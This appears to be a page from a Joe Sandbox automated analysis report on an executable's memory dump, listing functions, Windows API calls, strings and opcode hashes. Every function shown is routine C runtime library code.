Associated: 00000000.00000002.2129715506.0000000000503000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129816930.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129837394.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129866299.0000000000553000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129899709.000000000055D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129916941.0000000000562000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129916941.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_450000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 176f53f7d1528e1ece079d4dbd6502195030b629db2e788b50fc413c1f2272ae
Instruction ID: 3a9115976815dda0889f7a1440dbb2d521caf9fd5736eb1cd815d06f2cc59384
Opcode Fuzzy Hash: 176f53f7d1528e1ece079d4dbd6502195030b629db2e788b50fc413c1f2272ae
Instruction Fuzzy Hash: BBC08C78800A0057CF69992083713AA3354F3917C6F8408CFC8020B752D51EAC86DA04

Uniqueness

Uniqueness Score: -1.00%

Function 004E5496 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeLibrary.KERNEL32(00000000,?,00000000,00000800), ref: 004E5557

Strings

api-ms-, xrefs: 004E54ED
ext-ms-, xrefs: 004E5501

Memory Dump Source

Source File: 00000000.00000002.2129715506.0000000000460000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true

Associated: 00000000.00000002.2129698467.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129715506.0000000000451000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129715506.000000000045C000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129715506.0000000000503000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129816930.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129837394.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129866299.0000000000553000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129899709.000000000055D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129916941.0000000000562000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129916941.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_450000_file.jbxd

Yara matches

Similarity

API ID: FreeLibrary
String ID: api-ms-$ext-ms-
API String ID: 3664257935-537541572
Opcode ID: 920c7f648574e15737c29bba136ce2df161085614c358394edc06082a146fa94
Instruction ID: 630f09b0cee1098f61e66f0165781f0e4cfae493efec77c1c9aafe7d0de6474a
Opcode Fuzzy Hash: 920c7f648574e15737c29bba136ce2df161085614c358394edc06082a146fa94
Instruction Fuzzy Hash: C2216D32A01D50FBC7219B2AEC45A6B376ADB51375F240112ED06A73C4E774EE04DBD8

Uniqueness

Uniqueness Score: -1.00%

Function 00495DE3 Relevance: 9.2, APIs: 6, Instructions: 225
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCPInfo.KERNEL32(?,?), ref: 00495E6E
MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00495EFA
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00495F65
MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00495F81
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00495FE4
CompareStringEx.KERNEL32(?,?,00000000,?,00000000,?,00000000,00000000,00000000), ref: 00496001

Memory Dump Source

Source File: 00000000.00000002.2129715506.0000000000460000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true

Associated: 00000000.00000002.2129698467.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129715506.0000000000451000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129715506.000000000045C000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129715506.0000000000503000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129816930.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129837394.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129866299.0000000000553000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129899709.000000000055D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129916941.0000000000562000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129916941.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_450000_file.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$CompareInfoString
String ID:
API String ID: 2984826149-0
Opcode ID: d4090e9f5678f68b57803d7aa467d148aa7aa8ab03a4f7641fa962539c45398d
Instruction ID: d4eac9fffabfee3a1065a087a2294ceb555d5822076f2e8d9c447ca1866e5926
Opcode Fuzzy Hash: d4090e9f5678f68b57803d7aa467d148aa7aa8ab03a4f7641fa962539c45398d
Instruction Fuzzy Hash: B771D132900659ABDF22DF64CC85BAF7FB5AF05365F25006BE814A7291D73A8D04C7A8

Uniqueness

Uniqueness Score: -1.00%

Function 0047567B Relevance: 9.2, APIs: 6, Instructions: 175
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 004756C4
MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000), ref: 0047572F
LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0047574C
LCMapStringEx.KERNEL32(?,?,00000000,00000000,?,?,00000000,00000000,00000000), ref: 0047578B
LCMapStringEx.KERNEL32(?,?,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 004757EA
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 0047580D

Memory Dump Source

Source File: 00000000.00000002.2129715506.0000000000460000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true

Associated: 00000000.00000002.2129698467.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129715506.0000000000451000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129715506.000000000045C000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129715506.0000000000503000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129816930.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129837394.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129866299.0000000000553000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129899709.000000000055D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129916941.0000000000562000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129916941.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_450000_file.jbxd

Yara matches

Similarity

API ID: ByteCharMultiStringWide
String ID:
API String ID: 2829165498-0
Opcode ID: 93ea37c8252d13b503e44d68a2019b91cde8d9752de2987ce24ea71cc0c05762
Instruction ID: 8d0cddab2bd9c31ae0642668cecc7b5ce0b8d51d39d490292eb89f2aa84c6d9e
Opcode Fuzzy Hash: 93ea37c8252d13b503e44d68a2019b91cde8d9752de2987ce24ea71cc0c05762
Instruction Fuzzy Hash: C951E232500609EBEF206F61DC44FEB3BA9EF44751F11842AFD18EA250D7B88C24CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 0049CF80 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 219
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_ValidateLocalCookies.LIBCMT ref: 0049CFB7
_ValidateLocalCookies.LIBCMT ref: 0049D048
_ValidateLocalCookies.LIBCMT ref: 0049D0C8

Strings

j2E, xrefs: 0049D065, 0049D06E, 0049D07F
csm, xrefs: 0049D05D

Memory Dump Source

Source File: 00000000.00000002.2129715506.0000000000460000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true

Associated: 00000000.00000002.2129698467.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129715506.0000000000451000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129715506.000000000045C000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129715506.0000000000503000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129816930.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129837394.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129866299.0000000000553000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129899709.000000000055D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129916941.0000000000562000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129916941.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_450000_file.jbxd

Yara matches

Similarity

API ID: CookiesLocalValidate
String ID: csm$j2E
API String ID: 2268201637-745517429
Opcode ID: f846e89b939f9fac9fcc4162ed96f5c8dfcdcd3e6ac35b0fe50633cd49c887cb
Instruction ID: a52c8f269c2cf8dbbd00dbdfe628e83ab6ab9805d7d8e9247629aaccce02eb56
Opcode Fuzzy Hash: f846e89b939f9fac9fcc4162ed96f5c8dfcdcd3e6ac35b0fe50633cd49c887cb
Instruction Fuzzy Hash: 5041E534E002049BCF10DF69C885AAEBFB1BF45318F1081ABED145B392D7799E0ACB95

Uniqueness

Uniqueness Score: -1.00%

Function 004DBC53 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 166
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameW.KERNEL32(00000000,00560B32,00000104), ref: 004DBCB0

Strings

<program name unknown>, xrefs: 004DBCBF
Microsoft Visual C++ Runtime Library, xrefs: 004DBD45
..., xrefs: 004DBCFE
Runtime Error!Program: , xrefs: 004DBC7C

Memory Dump Source

Source File: 00000000.00000002.2129715506.0000000000460000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true

Associated: 00000000.00000002.2129698467.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129715506.0000000000451000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129715506.000000000045C000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129715506.0000000000503000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129816930.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129837394.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129866299.0000000000553000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129899709.000000000055D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129916941.0000000000562000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129916941.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_450000_file.jbxd

Yara matches

Similarity

API ID: FileModuleName
String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
API String ID: 514040917-4022980321
Opcode ID: 4a30802c04841df2a83abd15dbcf2685ff6c1fa128fd34a144bf2a4650462620
Instruction ID: a1ed0363b521de17523a71cefa98b2a298d0b48522f4eb6ce8ce0f2dc6653505
Opcode Fuzzy Hash: 4a30802c04841df2a83abd15dbcf2685ff6c1fa128fd34a144bf2a4650462620
Instruction Fuzzy Hash: FB214F72A40301B6D63016565C6AE9B2B9DEB93788F05002BFD44933D2F7DDDA44C1E9

Uniqueness

Uniqueness Score: -1.00%

Function 004DD781 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,87190059,?,?,00000000,00507477,000000FF,?,004DD6E4,?,?,004DD693,?), ref: 004DD7B6
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 004DD7C8
FreeLibrary.KERNEL32(00000000,?,?,00000000,00507477,000000FF,?,004DD6E4,?,?,004DD693,?), ref: 004DD7EA

Strings

CorExitProcess, xrefs: 004DD7C0
mscoree.dll, xrefs: 004DD7AF

Memory Dump Source

Source File: 00000000.00000002.2129715506.0000000000460000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true

Associated: 00000000.00000002.2129698467.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129715506.0000000000451000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129715506.000000000045C000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129715506.0000000000503000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129816930.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129837394.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129866299.0000000000553000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129899709.000000000055D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129916941.0000000000562000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129916941.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_450000_file.jbxd

Yara matches

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: bf74ed68e0683a89b9dd9985ad32ec1e3a2d8293ca8db7447632a70393a6cbfa
Instruction ID: 630a2a2e5f5d1a717ffd2899a0b5a6bd650e4c8af26128a50991dd5562e7f835
Opcode Fuzzy Hash: bf74ed68e0683a89b9dd9985ad32ec1e3a2d8293ca8db7447632a70393a6cbfa
Instruction Fuzzy Hash: 8C01A232944659AFDB118F54CC49FAEBBB8FB04B25F000626E811A23D0DBB49944DA50

Uniqueness

Uniqueness Score: -1.00%

Function 004E56C9 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 35
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNEL32(?,00000000,00000800,?,004E5665), ref: 004E56D8
GetLastError.KERNEL32(?,004E5665), ref: 004E56E2
LoadLibraryExW.KERNEL32(?,00000000,00000000), ref: 004E5720

Strings

api-ms-, xrefs: 004E56EF
ext-ms-, xrefs: 004E5705

Memory Dump Source

Source File: 00000000.00000002.2129715506.0000000000460000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true

Associated: 00000000.00000002.2129698467.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129715506.0000000000451000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129715506.000000000045C000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129715506.0000000000503000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129816930.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129837394.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129866299.0000000000553000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129899709.000000000055D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129916941.0000000000562000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129916941.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_450000_file.jbxd

Yara matches

Similarity

API ID: LibraryLoad$ErrorLast
String ID: api-ms-$ext-ms-
API String ID: 3177248105-537541572
Opcode ID: e6d7f8ae55f9f14624db16b1c92e0dd632cf59a3220b6726c9ebf202ba135f04
Instruction ID: c3df2c325f9ec109208cc3adb756868acbbd1c003e7f06cae0587d1efaa9fea2
Opcode Fuzzy Hash: e6d7f8ae55f9f14624db16b1c92e0dd632cf59a3220b6726c9ebf202ba135f04
Instruction Fuzzy Hash: 92F0AE70780704F7EB201B52EC07B593E959B10796F104022FD4CA51D1E7B6D964D558

Uniqueness

Uniqueness Score: -1.00%

Function 004EA988 Relevance: 7.8, APIs: 5, Instructions: 298
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.2129715506.0000000000460000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true

Associated: 00000000.00000002.2129698467.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129715506.0000000000451000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129715506.000000000045C000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129715506.0000000000503000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129816930.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129837394.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129866299.0000000000553000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129899709.000000000055D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129916941.0000000000562000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129916941.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_450000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ecd86a08fdebb5a0c375ac67f0d1ce005660ca64ef0dc88090b660ce2f8646ae
Instruction ID: 9f67985be35edbd09baeef51ac45c99575f7f162d1157d8c77509c755dd7ff32
Opcode Fuzzy Hash: ecd86a08fdebb5a0c375ac67f0d1ce005660ca64ef0dc88090b660ce2f8646ae
Instruction Fuzzy Hash: 6EB15E70E04289AFDB11DF9AC880B7E7BB1FF45306F14415AE90097392C778AD56DB2A

Uniqueness

Uniqueness Score: -1.00%

Function 00539C49 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 00539C55

Part of subcall function 00539E2C: __getptd_noexit.LIBCMT ref: 00539E2F
Part of subcall function 00539E2C: __amsg_exit.LIBCMT ref: 00539E3C

__getptd.LIBCMT ref: 00539C6C
__amsg_exit.LIBCMT ref: 00539C7A
__lock.LIBCMT ref: 00539C8A
__updatetlocinfoEx_nolock.LIBCMT ref: 00539C9E

Memory Dump Source

Source File: 00000000.00000002.2129837394.000000000051F000.00000004.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true

Associated: 00000000.00000002.2129698467.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129715506.0000000000451000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129715506.000000000045C000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129715506.0000000000460000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129715506.0000000000503000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129816930.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129866299.0000000000553000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129899709.000000000055D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129916941.0000000000562000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129916941.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_450000_file.jbxd

Yara matches

Similarity

API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
String ID:
API String ID: 938513278-0
Opcode ID: 14d360ddc5f5134c6b4350502512b9c4de46fda78e3925e90e5399c2ca0cd54f
Instruction ID: e8aed6441f031a4c07fa1ca4c961029c9d67b4a9d92b609dcf4cd84669e7387e
Opcode Fuzzy Hash: 14d360ddc5f5134c6b4350502512b9c4de46fda78e3925e90e5399c2ca0cd54f
Instruction Fuzzy Hash: E0F096B19057169ADB25BBB8980B79E7FE0BFC0720F101259F0405B1D2CFB45D41D659

Uniqueness

Uniqueness Score: -1.00%

Function 004A7D0A Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,00000000,00000800,?,004A7B1C), ref: 004A7D17
GetLastError.KERNEL32(?,004A7B1C), ref: 004A7D21
LoadLibraryExW.KERNEL32(?,00000000,00000000), ref: 004A7D49

Strings

api-ms-, xrefs: 004A7D2E

Memory Dump Source

Source File: 00000000.00000002.2129715506.0000000000460000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true

Associated: 00000000.00000002.2129698467.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129715506.0000000000451000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129715506.000000000045C000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129715506.0000000000503000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129816930.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129837394.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129866299.0000000000553000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129899709.000000000055D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129916941.0000000000562000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129916941.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_450000_file.jbxd

Yara matches

Similarity

API ID: LibraryLoad$ErrorLast
String ID: api-ms-
API String ID: 3177248105-2084034818
Opcode ID: 07ec884d25f8022af0f9ae05513fbf5eccc35e850112c7b41e317b93d34cf20b
Instruction ID: 825857783a70bc40ee723fc9807177485b069bf5f8b6ea94bce939fed2f9e967
Opcode Fuzzy Hash: 07ec884d25f8022af0f9ae05513fbf5eccc35e850112c7b41e317b93d34cf20b
Instruction Fuzzy Hash: A4E0D830344208B7EF201B50DC0AB693F59AF20B50F104022FA0DE40F0D7B6D854D948

Uniqueness

Uniqueness Score: -1.00%

Function 004E7F99 Relevance: 6.3, APIs: 4, Instructions: 338fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32(87190059), ref: 004E7FFC
WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 004E8257
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 004E829F
GetLastError.KERNEL32 ref: 004E8342

Memory Dump Source

Source File: 00000000.00000002.2129715506.0000000000460000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true

Associated: 00000000.00000002.2129698467.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129715506.0000000000451000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129715506.000000000045C000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129715506.0000000000503000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129816930.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129837394.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129866299.0000000000553000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129899709.000000000055D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129916941.0000000000562000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129916941.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_450000_file.jbxd

Yara matches

Similarity

API ID: FileWrite$ConsoleErrorLastOutput
String ID:
API String ID: 2718003287-0
Opcode ID: a7aaf374b15013a43678ad1cc501ac73e668af155dfe7a7187276eae88928500
Instruction ID: 14292cd49913457e0d99e526e0bb8349f73801b9219ce5881fa5fb927687c407
Opcode Fuzzy Hash: a7aaf374b15013a43678ad1cc501ac73e668af155dfe7a7187276eae88928500
Instruction Fuzzy Hash: CED17875D006989FCF11CFA9D8809AEBBB4FF09305F18416EE81AEB351DB34A846CB54

Uniqueness

Uniqueness Score: -1.00%

Function 004EF9A0 Relevance: 6.1, APIs: 4, Instructions: 74COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 004EF9A8
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 004EF9E0
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 004EFA00

Memory Dump Source

Source File: 00000000.00000002.2129715506.0000000000460000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true

Associated: 00000000.00000002.2129698467.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129715506.0000000000451000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129715506.000000000045C000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129715506.0000000000503000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129816930.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129837394.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129866299.0000000000553000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129899709.000000000055D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129916941.0000000000562000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129916941.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_450000_file.jbxd

Yara matches

Similarity

API ID: EnvironmentStrings$Free
String ID:
API String ID: 3328510275-0
Opcode ID: 4559acc6bf7d8a9ef1d0685a7281ac7364523589f271ddd24eb675fedd29e5ff
Instruction ID: 50a70cac12083e4d1c488bcb0f3b76658c34b60eb8585d27b252e7ae72160aef
Opcode Fuzzy Hash: 4559acc6bf7d8a9ef1d0685a7281ac7364523589f271ddd24eb675fedd29e5ff
Instruction Fuzzy Hash: 0C1148B1502509BFA61127B75CC9C7F295CDF9639A710003AFD05C6202FB7CCD09917A

Uniqueness

Uniqueness Score: -1.00%

Function 004EB1DE Relevance: 6.1, APIs: 4, Instructions: 54COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,?), ref: 004EB1F4
GetLastError.KERNEL32(?,?,?,?), ref: 004EB201
SetFilePointerEx.KERNEL32(?,?,?,?,?), ref: 004EB227
SetFilePointerEx.KERNEL32(?,?,?,00000000,00000000,?,?,?), ref: 004EB24D

Memory Dump Source

Source File: 00000000.00000002.2129715506.0000000000460000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true

Associated: 00000000.00000002.2129698467.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129715506.0000000000451000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129715506.000000000045C000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129715506.0000000000503000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129816930.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129837394.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129866299.0000000000553000.00000040.00000001.01000000.00000003.sdmpDownload File
